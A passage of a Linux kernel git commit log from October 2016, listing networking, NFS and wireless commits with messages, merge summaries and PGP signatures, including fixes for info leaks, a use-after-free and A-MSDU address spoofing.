Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:05:14 -04:00
stephen hemminger
cf53b1da73 Revert "net: Add driver helper functions to determine checksum offloadability"
This reverts commit 6ae23ad362.

The code has been in kernel since 4.4 but there are no in tree
code that uses. Unused code is broken code, remove it.

Signed-off-by: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:02:56 -04:00
Vadim Fedorenko
68d00f332e ip6_tunnel: fix ip6_tnl_lookup
The commit ea3dc9601b ("ip6_tunnel: Add support for wildcard tunnel
endpoints.") introduces support for wildcards in tunnels endpoints,
but in some rare circumstances ip6_tnl_lookup selects wrong tunnel
interface relying only on source or destination address of the packet
and not checking presence of wildcard in tunnels endpoints. Later in
ip6_tnl_rcv this packets can be dicarded because of difference in
ipproto even if fallback device have proper ipproto configuration.

This patch adds checks of wildcard endpoint in tunnel avoiding such
behavior

Fixes: ea3dc9601b ("ip6_tunnel: Add support for wildcard tunnel endpoints.")
Signed-off-by: Vadim Fedorenko <junk@yandex-team.ru>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-14 10:01:26 -04:00
David S. Miller
8eed1cd4cd Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net 2016-10-14 10:00:27 -04:00
Linus Torvalds
29fbff8698 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Pull networking fixes from David Miller:

 1) Fix various build warnings in tlan/qed/xen-netback drivers, from
    Arnd Bergmann.

 2) Propagate proper error code in strparser's strp_recv(), from Geert
    Uytterhoeven.

 3) Fix accidental broadcast of RTM_GETTFILTER responses, from Eric
    Dumazret.

 4) Need to use list_for_each_entry_safe() in qed driver, from Wei
    Yongjun.

 5) Openvswitch 802.1AD bug fixes from Jiri Benc.

 6) Cure BUILD_BUG_ON() in mlx5 driver, from Tom Herbert.

 7) Fix UDP ipv6 checksumming in netvsc driver, from Stephen Hemminger.

 8) stmmac driver fixes from Giuseppe CAVALLARO.

 9) Fix access to mangled IP6CB in tcp, from Eric Dumazet.

10) Fix info leaks in tipc and rtnetlink, from Dan Carpenter.

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net: (27 commits)
  net: bridge: add the multicast_flood flag attribute to brport_attrs
  net: axienet: Remove unused parameter from __axienet_device_reset
  liquidio: CN23XX: fix a loop timeout
  net: rtnl: info leak in rtnl_fill_vfinfo()
  tipc: info leak in __tipc_nl_add_udp_addr()
  net: ipv4: Do not drop to make_route if oif is l3mdev
  net: phy: Trigger state machine on state change and not polling.
  ipv6: tcp: restore IP6CB for pktoptions skbs
  netvsc: Remove mistaken udp.h inclusion.
  xen-netback: fix type mismatch warning
  stmmac: fix error check when init ptp
  stmmac: fix ptp init for gmac4
  qed: fix old-style function definition
  netvsc: fix checksum on UDP IPV6
  net_sched: reorder pernet ops and act ops registrations
  xen-netback: fix guest Rx stall detection (after guest Rx refactor)
  drivers/ptp: Fix kernel memory disclosure
  net/mlx5: Add MLX5_ARRAY_SET64 to fix BUILD_BUG_ON
  qmi_wwan: add support for Quectel EC21 and EC25
  openvswitch: add NETIF_F_HW_VLAN_STAG_TX to internal dev
  ...
2016-10-13 21:40:23 -07:00
Linus Torvalds
c4a86165d1 NFS client updates for Linux 4.9
Highlights include:
 
 Stable bugfixes:
 - sunrpc: fix writ espace race causing stalls
 - NFS: Fix inode corruption in nfs_prime_dcache()
 - NFSv4: Don't report revoked delegations as valid in
   nfs_have_delegation()
 - NFSv4: nfs4_copy_delegation_stateid() must fail if the delegation is
   invalid
 - NFSv4: Open state recovery must account for file permission changes
 - NFSv4.2: Fix a reference leak in nfs42_proc_layoutstats_generic
 
 Features:
 - Add support for tracking multiple layout types with an ordered list
 - Add support for using multiple backchannel threads on the client
 - Add support for pNFS file layout session trunking
 - Delay xprtrdma use of DMA API (for device driver removal)
 - Add support for xprtrdma remote invalidation
 - Add support for larger xprtrdma inline thresholds
 - Use a scatter/gather list for sending xprtrdma RPC calls
 - Add support for the CB_NOTIFY_LOCK callback
 - Improve hashing sunrpc auth_creds by using both uid and gid
 
 Bugfixes:
 - Fix xprtrdma use of DMA API
 - Validate filenames before adding to the dcache
 - Fix corruption of xdr->nwords in xdr_copy_to_scratch
 - Fix setting buffer length in xdr_set_next_buffer()
 - Don't deadlock the state manager on the SEQUENCE status flags
 - Various delegation and stateid related fixes
 - Retry operations if an interrupted slot receives EREMOTEIO
 - Make nfs boot time y2038 safe
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCAAGBQJX/+ZfAAoJENfLVL+wpUDr5MUP/16s2Kp9ZZZZ7ICi3yrHOzb0
 9WpCOmbKUIELXl8YgkxlvPUYMzTQTIc32TwbVgdFV0g41my/0+O3z3+IiTrUGxH5
 8LgouMWBZ9KKmyUB//+KQAXr3j/bvDdF6Li6wJfz8a2o+9xT4oTkK1+Js8p0kn6e
 HNKfRknfCKwvE+j4tPCLfs2RX5qDyBFILXwWhj1fAbmT3rbnp+QqkXD4mWUrXb9z
 DBgxciXRhOkOQQAD2KQBFd2kUqWDZ5ED23b+aYsu9D3VCW45zitBqQFAxkQWL0hp
 x8Mp+MDCxlgdEaGQPUmUiDtPkG1X9ZxUJCAwaJWWsZaItwR2Il+en2sETctnTZ1X
 0IAxZVFdolzSeLzIfNx3OG32JdWJdaNjUzkIZam8gO6i1f6PAmK4alR0J3CT31nJ
 /OEN76o1E7acGWRMmj+MAZ2U5gPfR7EitOzyE8ZUPcHgyeGMiynjwi56WIpeSvT2
 F/Sp5kRe5+D5gtnYuppGp7Srp5vYdtFaz1zgPDUKpDLcxfDweO8AHGjJf3Zmrunx
 X24yia4A14CnfcUy4vKpISXRykmkG/3Z0tpWwV53uXZm4nlQfRc7gPibiW7Ay521
 af8sDoItW98K3DK5NQU7IUn83ua1TStzpoqlAEafRw//g9zPMTbhHvNvOyrRfrcX
 kjWn6hNblMu9M34JOjtu
 =XOrF
 -----END PGP SIGNATURE-----

Merge tag 'nfs-for-4.9-1' of git://git.linux-nfs.org/projects/anna/linux-nfs

Pull NFS client updates from Anna Schumaker:
 "Highlights include:

  Stable bugfixes:
   - sunrpc: fix writ espace race causing stalls
   - NFS: Fix inode corruption in nfs_prime_dcache()
   - NFSv4: Don't report revoked delegations as valid in nfs_have_delegation()
   - NFSv4: nfs4_copy_delegation_stateid() must fail if the delegation is invalid
   - NFSv4: Open state recovery must account for file permission changes
   - NFSv4.2: Fix a reference leak in nfs42_proc_layoutstats_generic

  Features:
   - Add support for tracking multiple layout types with an ordered list
   - Add support for using multiple backchannel threads on the client
   - Add support for pNFS file layout session trunking
   - Delay xprtrdma use of DMA API (for device driver removal)
   - Add support for xprtrdma remote invalidation
   - Add support for larger xprtrdma inline thresholds
   - Use a scatter/gather list for sending xprtrdma RPC calls
   - Add support for the CB_NOTIFY_LOCK callback
   - Improve hashing sunrpc auth_creds by using both uid and gid

  Bugfixes:
   - Fix xprtrdma use of DMA API
   - Validate filenames before adding to the dcache
   - Fix corruption of xdr->nwords in xdr_copy_to_scratch
   - Fix setting buffer length in xdr_set_next_buffer()
   - Don't deadlock the state manager on the SEQUENCE status flags
   - Various delegation and stateid related fixes
   - Retry operations if an interrupted slot receives EREMOTEIO
   - Make nfs boot time y2038 safe"

* tag 'nfs-for-4.9-1' of git://git.linux-nfs.org/projects/anna/linux-nfs: (100 commits)
  NFSv4.2: Fix a reference leak in nfs42_proc_layoutstats_generic
  fs: nfs: Make nfs boot time y2038 safe
  sunrpc: replace generic auth_cred hash with auth-specific function
  sunrpc: add RPCSEC_GSS hash_cred() function
  sunrpc: add auth_unix hash_cred() function
  sunrpc: add generic_auth hash_cred() function
  sunrpc: add hash_cred() function to rpc_authops struct
  Retry operation on EREMOTEIO on an interrupted slot
  pNFS: Fix atime updates on pNFS clients
  sunrpc: queue work on system_power_efficient_wq
  NFSv4.1: Even if the stateid is OK, we may need to recover the open modes
  NFSv4: If recovery failed for a specific open stateid, then don't retry
  NFSv4: Fix retry issues with nfs41_test/free_stateid
  NFSv4: Open state recovery must account for file permission changes
  NFSv4: Mark the lock and open stateids as invalid after freeing them
  NFSv4: Don't test open_stateid unless it is set
  NFSv4: nfs4_do_handle_exception() handle revoke/expiry of a single stateid
  NFS: Always call nfs_inode_find_state_and_recover() when revoking a delegation
  NFSv4: Fix a race when updating an open_stateid
  NFSv4: Fix a race in nfs_inode_reclaim_delegation()
  ...
2016-10-13 21:28:20 -07:00
Linus Torvalds
2778556474 Some RDMA work and some good bugfixes, and two new features that could
benefit from user testing:
 
 Anna Schumacker contributed a simple NFSv4.2 COPY implementation.  COPY
 is already supported on the client side, so a call to copy_file_range()
 on a recent client should now result in a server-side copy that doesn't
 require all the data to make a round trip to the client and back.
 
 Jeff Layton implemented callbacks to notify clients when contended locks
 become available, which should reduce latency on workloads with
 contended locks.
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABAgAGBQJX/mcsAAoJECebzXlCjuG+MU0P/3SzTLGYXU5yOTAorx255/uf
 fUVKQQhTzzaA2xj3gWWWztYx3y0ZJUVgwU56a+Ap5Z8/goqDQ78H+ePEc+MG7BT/
 /UXS/bITvt0MP/dvPrDzhSltvqx/wpelLPBo29hGLlAQ2dsnD4Y75IbOOQccWqcC
 iD2v6x7lnpWZ7j9Zhwzg/JNQHwISIb7tiLoYBjfcdNDEMU76KIyhxD0Cx9MSeBzH
 9Rq/oEdwGDFS5WqVfNe2jxbngoauq1IupziQ2eQGv2D/POyXCx8fphoYjDz1XaW8
 PxaJtJtM2owPGG+z2CxklJqNaS1Z4F+oppjg+nf4i/ibxmIBaTy8NluASX3vMh69
 CDO1+ly+TiF0l1VqMOQJWRnqn1qGk6fLpF6P1Ac62B0oWpeLGU7nmik7XN1ORgsi
 8ksxRKNAWeprZo3wl5xNrADu/wlZ7XCJTc4QoHEgYT04aHF+j8EMCHv+mtZ8+Bwn
 WWiA8iItZOgXV4vitCRJlvsixjYvmF3djPIoI2Lt5KDWIg+eL89sKwzTALSfeC4m
 Vjb0svzPX1MmZCNP1rCStFbl3gZYXZyqPk+uA6M7H8mjAjVeKxRPowWpMBgvYZHr
 FjCPb878bAuqCeBVbIyOLLcKWBLTw8PsUWZAor3gNg454JGkMjLUyJ/S22Cz5Nbo
 HdjoiTJtbPrHnCwTMXwa
 =nozl
 -----END PGP SIGNATURE-----

Merge tag 'nfsd-4.9' of git://linux-nfs.org/~bfields/linux

Pull nfsd updates from Bruce Fields:
 "Some RDMA work and some good bugfixes, and two new features that could
  benefit from user testing:

   - Anna Schumacker contributed a simple NFSv4.2 COPY implementation.
     COPY is already supported on the client side, so a call to
     copy_file_range() on a recent client should now result in a
     server-side copy that doesn't require all the data to make a round
     trip to the client and back.

   - Jeff Layton implemented callbacks to notify clients when contended
     locks become available, which should reduce latency on workloads
     with contended locks"

* tag 'nfsd-4.9' of git://linux-nfs.org/~bfields/linux:
  NFSD: Implement the COPY call
  nfsd: handle EUCLEAN
  nfsd: only WARN once on unmapped errors
  exportfs: be careful to only return expected errors.
  nfsd4: setclientid_confirm with unmatched verifier should fail
  nfsd: randomize SETCLIENTID reply to help distinguish servers
  nfsd: set the MAY_NOTIFY_LOCK flag in OPEN replies
  nfs: add a new NFS4_OPEN_RESULT_MAY_NOTIFY_LOCK constant
  nfsd: add a LRU list for blocked locks
  nfsd: have nfsd4_lock use blocking locks for v4.1+ locks
  nfsd: plumb in a CB_NOTIFY_LOCK operation
  NFSD: fix corruption in notifier registration
  svcrdma: support Remote Invalidation
  svcrdma: Server-side support for rpcrdma_connect_private
  rpcrdma: RDMA/CM private message data structure
  svcrdma: Skip put_page() when send_reply() fails
  svcrdma: Tail iovec leaves an orphaned DMA mapping
  nfsd: fix dprintk in nfsd4_encode_getdeviceinfo
  nfsd: eliminate cb_minorversion field
  nfsd: don't set a FL_LAYOUT lease for flexfiles layouts
2016-10-13 21:04:42 -07:00
Nikolay Aleksandrov
4eb6753c33 net: bridge: add the multicast_flood flag attribute to brport_attrs
When I added the multicast flood control flag, I also added an attribute
for it for sysfs similar to other flags, but I forgot to add it to
brport_attrs.

Fixes: b6cb5ac833 ("net: bridge: add per-port multicast flood flag")
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 12:16:36 -04:00
Dan Carpenter
775f4f0550 net: rtnl: info leak in rtnl_fill_vfinfo()
The "vf_vlan_info" struct ends with a 2 byte struct hole so we have to
memset it to ensure that no stack information is revealed to user space.

Fixes: 79aab093a0 ('net: Update API for VF vlan protocol 802.1ad support')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 12:12:04 -04:00
Dan Carpenter
7307616245 tipc: info leak in __tipc_nl_add_udp_addr()
We should clear out the padding and unused struct members so that we
don't expose stack information to userspace.

Fixes: fdb3accc2c ('tipc: add the ability to get UDP options via netlink')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 12:10:01 -04:00
David Ahern
6104e112f4 net: ipv4: Do not drop to make_route if oif is l3mdev
Commit e0d56fdd73 was a bit aggressive removing l3mdev calls in
the IPv4 stack. If the fib_lookup fails we do not want to drop to
make_route if the oif is an l3mdev device.

Also reverts 19664c6a00 ("net: l3mdev: Remove netif_index_is_l3_master")
which removed netif_index_is_l3_master.

Fixes: e0d56fdd73 ("net: l3mdev: remove redundant calls")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 12:05:26 -04:00
Eric Dumazet
8ce48623f0 ipv6: tcp: restore IP6CB for pktoptions skbs
Baozeng Ding reported following KASAN splat :

BUG: KASAN: use-after-free in ip6_datagram_recv_specific_ctl+0x13f1/0x15c0 at addr ffff880029c84ec8
Read of size 1 by task poc/25548
Call Trace:
 [<ffffffff82cf43c9>] dump_stack+0x12e/0x185 /lib/dump_stack.c:15
 [<     inline     >] print_address_description /mm/kasan/report.c:204
 [<ffffffff817ced3b>] kasan_report_error+0x48b/0x4b0 /mm/kasan/report.c:283
 [<     inline     >] kasan_report /mm/kasan/report.c:303
 [<ffffffff817ced9e>] __asan_report_load1_noabort+0x3e/0x40 /mm/kasan/report.c:321
 [<ffffffff85c71da1>] ip6_datagram_recv_specific_ctl+0x13f1/0x15c0 /net/ipv6/datagram.c:687
 [<ffffffff85c734c3>] ip6_datagram_recv_ctl+0x33/0x40
 [<ffffffff85c0b07c>] do_ipv6_getsockopt.isra.4+0xaec/0x2150
 [<ffffffff85c0c7f6>] ipv6_getsockopt+0x116/0x230
 [<ffffffff859b5a12>] tcp_getsockopt+0x82/0xd0 /net/ipv4/tcp.c:3035
 [<ffffffff855fb385>] sock_common_getsockopt+0x95/0xd0 /net/core/sock.c:2647
 [<     inline     >] SYSC_getsockopt /net/socket.c:1776
 [<ffffffff855f8ba2>] SyS_getsockopt+0x142/0x230 /net/socket.c:1758
 [<ffffffff8685cdc5>] entry_SYSCALL_64_fastpath+0x23/0xc6
Memory state around the buggy address:
 ffff880029c84d80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
 ffff880029c84e00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
> ffff880029c84e80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                              ^
 ffff880029c84f00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
 ffff880029c84f80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

He also provided a syzkaller reproducer.

Issue is that ip6_datagram_recv_specific_ctl() expects to find IP6CB
data that was moved at a different place in tcp_v6_rcv()

This patch moves tcp_v6_restore_cb() up and calls it from
tcp_v6_do_rcv() when np->pktoptions is set.

Fixes: 971f10eca1 ("tcp: better TCP_SKB_CB layout to reduce cache line misses")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Baozeng Ding <sploving1@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 11:07:34 -04:00
Roopa Prabhu
de1dfeefef bridge: add address and vlan to fdb warning messages
This patch adds vlan and address to warning messages printed
in the bridge fdb code for debuggability.

Signed-off-by: Roopa Prabhu <roopa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:49:54 -04:00
WANG Cong
ab102b80ce net_sched: reorder pernet ops and act ops registrations
Krister reported a kernel NULL pointer dereference after
tcf_action_init_1() invokes a_o->init(), it is a race condition
where one thread calling tcf_register_action() to initialize
the netns data after putting act ops in the global list and
the other thread searching the list and then calling
a_o->init(net, ...).

Fix this by moving the pernet ops registration before making
the action ops visible. This is fine because: a) we don't
rely on act_base in pernet ops->init(), b) in the worst case we
have a fully initialized netns but ops is still not ready so
new actions still can't be created.

Reported-by: Krister Johansen <kjlx@templeofstupid.com>
Tested-by: Krister Johansen <kjlx@templeofstupid.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:26:43 -04:00
Jiri Benc
3145c037e7 openvswitch: add NETIF_F_HW_VLAN_STAG_TX to internal dev
The internal device does support 802.1AD offloading since 018c1dda5f
("openvswitch: 802.1AD Flow handling, actions, vlan parsing, netlink
attributes").

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:03:23 -04:00
Jiri Benc
72ec108d70 openvswitch: fix vlan subtraction from packet length
When the packet has its vlan tag in skb->vlan_tci, the length of the VLAN
header is not counted in skb->len. It doesn't make sense to subtract it.

Fixes: 018c1dda5f ("openvswitch: 802.1AD Flow handling, actions, vlan parsing, netlink attributes")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:03:23 -04:00
Jiri Benc
20ecf1e4e3 openvswitch: vlan: remove wrong likely statement
This code is called whenever flow key is being extracted from the packet.
The packet may be as likely vlan tagged as not.

Fixes: 018c1dda5f ("openvswitch: 802.1AD Flow handling, actions, vlan parsing, netlink attributes")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 10:03:23 -04:00
Eric Dumazet
fa59b27c9d net_sched: do not broadcast RTM_GETTFILTER result
There are two ways to get tc filters from kernel to user space.

1) Full dump (tc_dump_tfilter())
2) RTM_GETTFILTER to get one precise filter, reducing overhead.

The second operation is unfortunately broadcasting its result,
polluting "tc monitor" users.

This patch makes sure only the requester gets the result, using
netlink_unicast() instead of rtnetlink_send()

Jamal cooked an iproute2 patch to implement "tc filter get" operation,
but other user space libraries already use RTM_GETTFILTER when a single
filter is queried, instead of dumping all filters.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:51:55 -04:00
Xin Long
8ae808eb85 sctp: remove the old ttl expires policy
The prsctp polices include ttl expires policy already, we should remove
the old ttl expires codes, and just adjust the new polices' codes to be
compatible with the old one for users.

This patch is to remove all the old expires codes, and if prsctp polices
are not set, it will still set msg's expires_at and check the expires in
sctp_check_abandoned.

Note that asoc->prsctp_enable is set by default, so users can't feel any
difference even if they use the old expires api in userspace.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:44:14 -04:00
Xin Long
cc6ac9bccf sctp: reuse sent_count to avoid retransmitted chunks for RTT measurements
Now sctp uses chunk->resent to record if a chunk is retransmitted, for
RTT measurements with retransmitted DATA chunks. chunk->sent_count was
introduced to record how many times one chunk has been sent for prsctp
RTX policy before. We actually can know if one chunk is retransmitted
by checking chunk->sent_count is greater than 1.

This patch is to remove resent from sctp_chunk and reuse sent_count
to avoid retransmitted chunks for RTT measurements.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:44:13 -04:00
Jarod Wilson
a52ad514fd net: deprecate eth_change_mtu, remove usage
With centralized MTU checking, there's nothing productive done by
eth_change_mtu that isn't already done in dev_set_mtu, so mark it as
deprecated and remove all usage of it in the kernel. All callers have been
audited for calls to alloc_etherdev* or ether_setup directly, which means
they all have a valid dev->min_mtu and dev->max_mtu. Now eth_change_mtu
prints out a netdev_warn about being deprecated, for the benefit of
out-of-tree drivers that might be utilizing it.

Of note, dvb_net.c actually had dev->mtu = 4096, while using
eth_change_mtu, meaning that if you ever tried changing it's mtu, you
couldn't set it above 1500 anymore. It's now getting dev->max_mtu also set
to 4096 to remedy that.

v2: fix up lantiq_etop, missed breakage due to drive not compiling on x86

CC: netdev@vger.kernel.org
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:36:57 -04:00
Jarod Wilson
61e84623ac net: centralize net_device min/max MTU checking
While looking into an MTU issue with sfc, I started noticing that almost
every NIC driver with an ndo_change_mtu function implemented almost
exactly the same range checks, and in many cases, that was the only
practical thing their ndo_change_mtu function was doing. Quite a few
drivers have either 68, 64, 60 or 46 as their minimum MTU value checked,
and then various sizes from 1500 to 65535 for their maximum MTU value. We
can remove a whole lot of redundant code here if we simple store min_mtu
and max_mtu in net_device, and check against those in net/core/dev.c's
dev_set_mtu().

In theory, there should be zero functional change with this patch, it just
puts the infrastructure in place. Subsequent patches will attempt to start
using said infrastructure, with theoretically zero change in
functionality.

CC: netdev@vger.kernel.org
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-13 09:36:56 -04:00
Purushottam Kushwaha
0c317a02ca cfg80211: support virtual interfaces with different beacon intervals
This commit provides a mechanism for the host drivers to advertise the
support for different beacon intervals among the respective interface
combinations in a group, through NL80211_IFACE_COMB_BI_MIN_GCD (u32).

This value will be compared against GCD of all beaconing interfaces of
matching combinations.

If the driver doesn't advertise this value, the old behaviour where
all beacon intervals must be identical is retained.

If it is specified, then any beacon interval for an interface in the
interface combination as well as the GCD of all active beacon intervals
in the combination must be greater or equal to this value.

Signed-off-by: Purushottam Kushwaha <pkushwah@qti.qualcomm.com>
[change commit message, some variable names, small other things]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-13 14:28:29 +02:00
Purushottam Kushwaha
e227300c83 cfg80211: pass struct to interface combination check/iter
Move the growing parameter list to a structure for the interface
combination check and iteration functions in cfg80211 and mac80211
to make the code easier to understand.

Signed-off-by: Purushottam Kushwaha <pkushwah@qti.qualcomm.com>
[edit commit message]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-13 13:39:49 +02:00
David Howells
07096f612f rxrpc: Fix checking of error from ip6_route_output()
ip6_route_output() doesn't return a negative error when it fails, rather
the ->error field of the returned dst_entry struct needs to be checked.

Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Fixes: 75b54cb57c ("rxrpc: Add IPv6 support")
Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-13 08:43:17 +01:00
David Howells
54fde42345 rxrpc: Fix checker warning by not passing always-zero value to ERR_PTR()
Fix the following checker warning:

	net/rxrpc/call_object.c:279 rxrpc_new_client_call()
	warn: passing zero to 'ERR_PTR'

where a value that's always zero is passed to ERR_PTR() so that it can be
passed to a tracepoint in an auxiliary pointer field.

Just pass NULL instead to the tracepoint.

Fixes: a84a46d730 ("rxrpc: Add some additional call tracing")
Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-13 08:39:52 +01:00
Johannes Berg
32910bb951 mac80211: preserve more bits when building QoS header
Michael Braun reported that when trying to inject A-MSDUs over
monitor interfaces, the frame doesn't come out right since the
QoS header A-MSDU bit is overwritten.

Rather than adding that bit specifically simply preserve those
bits that we don't set here, since we typically get here with
a zeroed-out QoS header anyway.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 14:17:13 +02:00
Michael Braun
72f15d53f3 mac80211: filter multicast data packets on AP / AP_VLAN
This patch adds filtering for multicast data packets on AP_VLAN
interfaces that have no authorized station connected and changes
filtering on AP interfaces to not count stations assigned to
AP_VLAN interfaces.

This saves airtime and avoids waking up other stations currently
authorized in this BSS. When using WPA, the packets dropped could
not be decrypted by any station.

The behaviour when there are no AP_VLAN interfaces is left unchanged.

When there are AP_VLAN interfaces, this patch
1. adds filtering multicast data packets sent on AP_VLAN interfaces
   that have no authorized station connected.
   No filtering happens on 4addr AP_VLAN interfaces.
2. makes filtering of multicast data packets sent on AP interfaces
   depend on the number of authorized stations in this bss not
   assigned to an AP_VLAN interface.

Therefore, a new num_mcast_sta counter is added for AP_VLAN interfaces.
The existing one for AP interfaces is altered to not track stations
assigned to an AP_VLAN interface.

The new counter is exposed in debugfs.

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
[reformat commit message a bit, unline ieee80211_vif_{inc,dec}_num_mcast]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 11:33:29 +02:00
Michael Braun
5f9994bd4a mac80211: remove unnecessary num_mcast_sta check
Checking for num_mcast_sta in __ieee80211_request_smps_ap() is
unnecessary as sta list will be empty in this case anyway, so
the list iteration will just exit immediately. Since this isn't
a "hot" code path, it doesn't really matter, and the next patch
will redefine num_mcast_sta to make this check invalid.

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
[change commit message]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 11:11:08 +02:00
Johannes Berg
850092db5a mac80211: remove unnecessary mesh check
sta_info_get_bss() is equivalent to sta_info_get() in the
mesh case, since sta->sdata->bss will be NULL (it's only
set for AP/AP_VLAN interfaces.) Thus, the mesh check here
isn't actually needed - remove it.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 10:50:36 +02:00
Michael Braun
1d4de2e222 mac80211: fix CMD_FRAME for AP_VLAN
When using IEEE 802.11r FT OVER-DS roaming with AP_VLAN, hostapd needs to
send out a frame using CMD_FRAME for a station assigned to an AP_VLAN
interface.

Right now, the userspace needs to give the exact AP_VLAN interface index
for CMD_FRAME; hostapd does not do this. Additionally, userspace cannot
use GET_STATION to query the AP_VLAN ifidx, as while GET_STATION finds
stations assigned to AP_VLAN even if the AP iface is queried, it does not
return AP_VLAN ifidx (it returns the queried one).

This breaks IEEE 802.11r over_ds with vlans, as the reply frame does not
get out. This patch fixes this by using get_sta_bss for CMD_FRAME.

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:12 +02:00
Johannes Berg
e2b5227faa mac80211: validate DA/SA during A-MSDU decapsulation
As pointed out by Michael Braun, we don't check inner L2 addresses
during A-MSDU decapsulation, leading to the possibility that, for
example, a station associated to an AP sends frames as though they
came from somewhere else.

Fix this problem by letting cfg80211 validate the addresses, as
indicated by passing in the ones that need to be validated.

Reported-by: Michael Braun <michael-dev@fami-braun.de>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:11 +02:00
Johannes Berg
8b935ee2ea cfg80211: add ability to check DA/SA in A-MSDU decapsulation
We should not accept arbitrary DA/SA inside A-MSDUs, it could be used
to circumvent protections, like allowing a station to send frames and
make them seem to come from somewhere else.

Add the necessary infrastructure in cfg80211 to allow such checks, in
further patches we'll start using them.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:10 +02:00
Johannes Berg
7f6990c830 cfg80211: let ieee80211_amsdu_to_8023s() take only header-less SKB
There's only a single case where has_80211_header is passed as true,
which is in mac80211. Given that there's only simple code that needs
to be done before calling it, export that function from cfg80211
instead and let mac80211 call it itself.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:10 +02:00
Johannes Berg
ea720935cf mac80211: discard multicast and 4-addr A-MSDUs
In mac80211, multicast A-MSDUs are accepted in many cases that
they shouldn't be accepted in:
 * drop A-MSDUs with a multicast A1 (RA), as required by the
   spec in 9.11 (802.11-2012 version)
 * drop A-MSDUs with a 4-addr header, since the fourth address
   can't actually be useful for them; unless 4-address frame
   format is actually requested, even though the fourth address
   is still not useful in this case, but ignored

Accepting the first case, in particular, is very problematic
since it allows anyone else with possession of a GTK to send
unicast frames encapsulated in a multicast A-MSDU, even when
the AP has client isolation enabled.

Cc: stable@vger.kernel.org
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-12 09:19:09 +02:00
Ursula Braun
8c68b1a0e9 Subject: [PATCH] af_iucv: drop skbs rejected by filter
A packet filter might be installed for instance with setsockopt
SO_ATTACH_FILTER. af_iucv currently queues skbs rejected by filter
into the backlog queue. This does not make sense, since packets
rejected by filter can be dropped immediately. This patch adds
separate sk_filter return code checking, and dropping of packets
if applicable.

Signed-off-by: Ursula Braun <ubraun@linux.vnet.ibm.com>
